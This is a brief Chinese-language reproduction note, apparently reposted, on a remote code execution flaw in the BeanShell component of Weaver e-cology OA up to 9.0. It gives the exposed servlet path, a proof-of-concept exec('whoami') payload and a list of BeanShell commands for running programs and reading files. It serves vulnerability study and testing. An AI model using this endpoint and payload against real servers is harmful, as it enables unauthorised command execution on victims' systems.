泛微e-cology OA Beanshell組件遠程代碼執行漏洞復現CNNVD-201909-1041


靶機

影響版本 泛微e-cology<=9.0

https://github.com/jas502n/e-cology

部署

復現

/weaver/bsh.servlet.BshServlet

POC

exec("whoami")

這是BeanShell命令的其他一些示例

source(),run()-將bsh腳本讀入該解釋器,或在新的解釋器中運行
frame()-在Frame或JFrame中顯示GUI組件。
load(),save()-將可序列化的對象加載或保存到文件中。
cd(),cat(),dir(),pwd()等-類似於Unix的shell命令
exec()-運行本機應用程序
javap()-打印對象的方法和字段,類似於Java javap命令的輸出。
setAccessibility()-打開對私有組件和受保護組件的無限制訪問。


參考:https://github.com/jas502n/e-cology


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM